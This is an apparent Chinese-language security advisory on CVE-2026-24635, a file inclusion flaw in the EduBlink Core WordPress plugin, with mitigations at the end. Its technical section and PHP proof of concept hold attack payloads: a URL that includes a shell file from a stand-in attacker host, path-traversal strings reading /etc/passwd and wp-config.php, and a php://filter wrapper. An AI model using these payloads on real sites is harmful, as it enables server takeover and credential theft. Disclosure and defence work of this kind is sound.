CVE-2026-24635 EduBlink Core 远程文件包含漏洞

漏洞信息

漏洞编号

CVE-2026-24635

漏洞类型

远程文件包含(RFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

EduBlink Core (edublink-core WordPress插件)

漏洞概述

CVE-2026-24635是WordPress插件EduBlink Core中的一个高危安全漏洞，CVSS评分达到7.5分，属于高危级别。该漏洞属于PHP远程文件包含（Remote File Inclusion, RFI）类型，存在于插件的文件包含机制中，由于对用户可控的输入参数缺乏充分的验证和过滤，攻击者可以利用该漏洞远程包含恶意文件，从而执行任意PHP代码。

EduBlink Core是一款WordPress教育主题插件，提供了在线课程、教育机构网站构建等功能。该插件通过动态包含PHP文件来实现功能模块化，但未对include/require语句中的文件名参数进行严格的安全校验。攻击者只需构造特定的请求参数，即可诱导服务器包含远程服务器上的恶意PHP文件。

此漏洞的影响范围覆盖了EduBlink Core从初始版本到2.0.7的所有版本。由于该插件广泛应用于教育类网站，攻击者可能通过此漏洞获取网站服务器的控制权，进而窃取敏感数据、植入后门程序或进行进一步的横向渗透。该漏洞的利用不需要高权限认证，低权限用户即可触发，这进一步增加了漏洞的严重性。

该漏洞由Patchstack安全团队的审计人员发现并报告。鉴于其潜在的严重危害，建议使用该插件的用户立即采取修复措施，避免遭受恶意攻击。

技术细节

CVE-2026-24635漏洞源于EduBlink Core插件在处理PHP文件包含时，对用户输入的文件路径参数缺乏严格的输入验证。攻击者可以通过构造恶意的URL参数，将任意远程服务器上的PHP文件作为合法文件包含执行。

漏洞的技术原理如下：插件代码中存在类似include($_GET['file'])或require($_GET['page'])的代码模式，直接使用$_GET超全局变量中的用户可控参数作为文件路径传递给include/require语句。攻击者可以构造如下恶意请求：

http://target-site.com/wp-content/plugins/edublink-core/some-file.php?file=http://attacker-server.com/malicious.txt

当服务器配置允许远程文件包含（allow_url_include=On）时，PHP会从攻击者指定的远程URL获取文件内容并执行。由于PHP 5.2.0之后的默认配置禁止远程文件包含，此漏洞在默认配置下可能无法直接利用。但攻击者仍可通过本地文件包含（LFI）方式，结合目录遍历技术，读取服务器上的敏感文件，如/etc/passwd、wp-config.php等。

利用本地文件包含读取wp-config.php可以获取数据库凭证和WordPress盐值，进一步可能实现远程代码执行。攻击者可以上传包含恶意代码的图片文件或利用日志注入等方式写入PHP代码，然后通过文件包含漏洞触发执行。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的WordPress插件，确认为EduBlink Core且版本<=2.0.7

STEP 2

步骤2

漏洞探测：访问插件的PHP文件，识别存在文件包含功能且未过滤用户输入的端点

STEP 3

步骤3

构造恶意请求：构造包含远程文件URL或本地路径遍历序列的请求参数

STEP 4

步骤4

上传准备：攻击者准备包含恶意PHP代码的远程文件或利用日志注入在本地文件中写入shell

STEP 5

步骤5

触发包含：发送构造的请求，使服务器包含并执行恶意代码

STEP 6

步骤6

获取控制权：成功执行恶意代码后，获取服务器shell访问权限，实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2026-24635 PoC - EduBlink Core Remote File Inclusion
 * Target: EduBlink Core WordPress Plugin <= 2.0.7
 * Type: Remote/Local File Inclusion
 * Author: Security Researcher
 * Reference: https://patchstack.com/database/Wordpress/Plugin/edublink-core
 */

// Target URL configuration
$target_url = 'http://target-wordpress-site.com';
$plugin_path = '/wp-content/plugins/edublink-core/';

// Method 1: Remote File Inclusion (if allow_url_include is enabled)
$rfi_payload = array(
    'file' => 'http://attacker-server.com/shell.txt',
    // or using PHP wrapper
    'file' => 'php://filter/convert.base64-encode/resource=wp-config.php'
);

// Method 2: Local File Inclusion with path traversal
$lfi_payload = array(
    'file' => '../../../../../../../../etc/passwd',
    'file' => '../../../../../../wp-config.php'
);

// Construct malicious request
$vulnerable_endpoint = $target_url . $plugin_path . 'includes/any-vulnerable-file.php';

echo "[*] CVE-2026-24635 PoC\n";
echo "[*] Target: $target_url\n";
echo "[*] Testing Remote File Inclusion...\n";

// Note: Modify the endpoint based on actual vulnerable file
// Common patterns in EduBlink:
// ?file=../../config.php
// ?page=some-template.php
// ?module=../uploads/shell.php

// For demonstration, showing the attack vector structure
$attack_url = $vulnerable_endpoint . '?' . http_build_query($rfi_payload);
echo "[+] Attack URL: $attack_url\n";
echo "[+] If successful, remote PHP code will be executed.\n";
?>

影响范围

EduBlink Core <= 2.0.7 (所有版本)

防御指南

临时缓解措施

立即采取以下临时缓解措施：1) 在Web服务器配置中添加规则，拦截包含file、page、path等可疑参数的请求；2) 临时禁用或替换EduBlink Core插件，使用其他替代方案；3) 检查服务器访问日志，排查是否存在针对该漏洞的扫描或利用行为；4) 确保allow_url_fopen和allow_url_include在php.ini中设置为Off；5) 限制网站目录的读写权限，防止上传webshell。